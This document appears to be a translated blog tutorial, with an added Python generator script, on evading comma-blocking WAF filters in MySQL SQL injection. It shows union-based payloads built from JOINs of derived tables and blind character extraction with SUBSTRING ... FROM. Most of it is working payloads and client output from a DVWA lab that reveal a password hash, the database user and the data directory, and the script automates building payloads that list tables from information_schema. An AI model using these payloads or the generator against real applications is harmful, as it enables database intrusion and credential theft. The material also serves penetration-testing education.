SQL injection: bypassing a comma filter in union-based and blind injection

SQL injection comma bypass

1. Union-based (visible) injection: bypassing the comma filter

In a union-based injection we normally find the display positions with a probe of the form UNION SELECT 1,2,3,4,5,6,7..n. That statement contains several commas, so if a WAF blocks the comma character the usual union query no longer works.
Bypass
Build the row with JOINs of one-column derived tables instead of a comma-separated select list, then put the probe value, or any other expression, into the display position you want:

    union select 1,2,3;
    
    union select * from ((select 1)A join (select 2)B join (select 3)C);
    
    union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
    

Demonstrating the union query in the database
Everything from UNION onwards is what we would inject in the URL; the examples below are run directly in the mysql client. In a real attack, any comma in the injected part may get blocked.

    mysql> select user_id,user,password from users union select 1,2,3;
    +---------+-------+----------------------------------+
    | user_id | user  | password                         |
    +---------+-------+----------------------------------+
    |       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
    |       1 | 2     | 3                                |
    +---------+-------+----------------------------------+
    2 rows in set (0.04 sec)
    

Without any comma, injecting with JOIN

    mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
    +---------+-------+----------------------------------+
    | user_id | user  | password                         |
    +---------+-------+----------------------------------+
    |       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
    |       1 | 2     | 3                                |
    +---------+-------+----------------------------------+
    2 rows in set (0.05 sec)
    

Querying the data we actually want (note that this group_concat call still has commas between its own arguments; if the WAF blocks those as well, put each value in its own derived table, or use a single-argument group_concat such as group_concat(table_name)):

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
    +---------+-------+-------------------------------------------------+
    | user_id | user  | password                                        |
    +---------+-------+-------------------------------------------------+
    |       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99                |
    |       1 | 2     | root@192.168.228.1 dvwa c:phpStudyMySQLdata |
    +---------+-------+-------------------------------------------------+
    2 rows in set (0.08 sec)
    
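The JOIN-based row can be generated for any number of columns instead of being typed by hand. The following Python helper is an added example, not code from the original post: it builds the comma-free UNION payload for a list of per-column expressions, refuses any expression that itself contains a comma (which would defeat the point), and shows that a single-argument group_concat over information_schema keeps the whole payload comma-free. The alias names t0, t1, ... and the information_schema query are my own choices.

```python
"""Build a comma-free UNION SELECT payload from one-column derived tables.

Added example; not part of the original post. Instead of
    union select 1,2,3
it emits
    union select * from ((select 1)t0 join (select 2)t1 join (select 3)t2)
which yields the same three-column row without a single comma.
"""


def union_join_payload(exprs):
    """Return 'union select * from (...)' producing one row whose i-th column
    is exprs[i]. Every expression must itself be comma-free, otherwise the
    WAF rule the payload is meant to dodge would still fire."""
    if not exprs:
        raise ValueError("need at least one column expression")
    for e in exprs:
        if "," in e:
            raise ValueError(f"expression contains a comma: {e!r}")
    # Each column becomes its own single-row derived table; a CROSS JOIN of
    # single-row tables is still a single row, so the column count matches.
    parts = [f"(select {e})t{i}" for i, e in enumerate(exprs)]
    return "union select * from (" + " join ".join(parts) + ")"


def probe_payload(ncols):
    """Display-position probe, the comma-free equivalent of
    'union select 1,2,...,ncols'."""
    return union_join_payload([str(i) for i in range(1, ncols + 1)])


# Comma-free expressions for the display positions. group_concat with a
# single argument has no comma in the payload; the commas in its *output*
# are produced by the default separator and never pass through the WAF.
TABLE_LIST = ("(select group_concat(table_name) from information_schema.tables "
              "where table_schema=database())")


def data_payload():
    """Three-column row: user(), database() and the table list of the current
    schema, one value per column so no concat commas are needed."""
    return union_join_payload(["user()", "database()", TABLE_LIST])


if __name__ == "__main__":
    print(probe_payload(3))
    print(data_payload())
```

Prefix the result with the original query's WHERE-clause terminator (for example `1 ` before `union ...` on a numeric parameter) exactly as you would with the comma version; only the select list changes.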

2. Blind injection: bypassing the comma filter

MID() and SUBSTR() extract characters from a text field; in their usual form both take a comma-separated start position and length:

    mysql> select mid(user(),1,2);
    +-----------------+
    | mid(user(),1,2) |
    +-----------------+
    | ro              |
    +-----------------+
    1 row in set (0.04 sec)
    

Querying the ASCII code of the first character of the database user name. mid(user(),1,2) returns "ro", but ascii() only looks at the leftmost character, so the result is 114 ('r'); note this payload still contains commas.

    mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
    +---------+-------+----------------------------------+
    | user_id | user  | password                         |
    +---------+-------+----------------------------------+
    |       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
    |     114 | 2     | 3                                |
    +---------+-------+----------------------------------+
    2 rows in set (0.05 sec)
    

Blind injection: guessing the ASCII value (a wrong guess returns no row, a correct one returns the original row)

    mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
    Empty set
    
    mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
    +---------+-------+----------------------------------+
    | user_id | user  | password                         |
    +---------+-------+----------------------------------+
    |       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
    +---------+-------+----------------------------------+
    1 row in set (0.04 sec)
    

Comma-free alternative: the SUBSTRING ... FROM form
substring(str FROM pos)
Returns the substring of str starting at (1-based) position pos and running to the end of the string; no comma is needed.

    mysql> select substring('hello' from 1);
    +---------------------------+
    | substring('hello' from 1) |
    +---------------------------+
    | hello                     |
    +---------------------------+
    1 row in set (0.04 sec)
    
    mysql> select substring('hello' from 2);
    +---------------------------+
    | substring('hello' from 2) |
    +---------------------------+
    | ello                      |
    +---------------------------+
    1 row in set (0.03 sec)
    

Injecting with it

    mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
    Empty set
substring(user() from 2) returns "oot@192.168.228.1"; ascii() takes its first character, 'o', whose ASCII code is 111, so 114 ('r') fails and 111 matches:
    mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
    +---------+-------+----------------------------------+
    | user_id | user  | password                         |
    +---------+-------+----------------------------------+
    |       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
    +---------+-------+----------------------------------+
    1 row in set (0.03 sec)
    
Original post: https://www.cnblogs.com/hackxf/p/9490534.html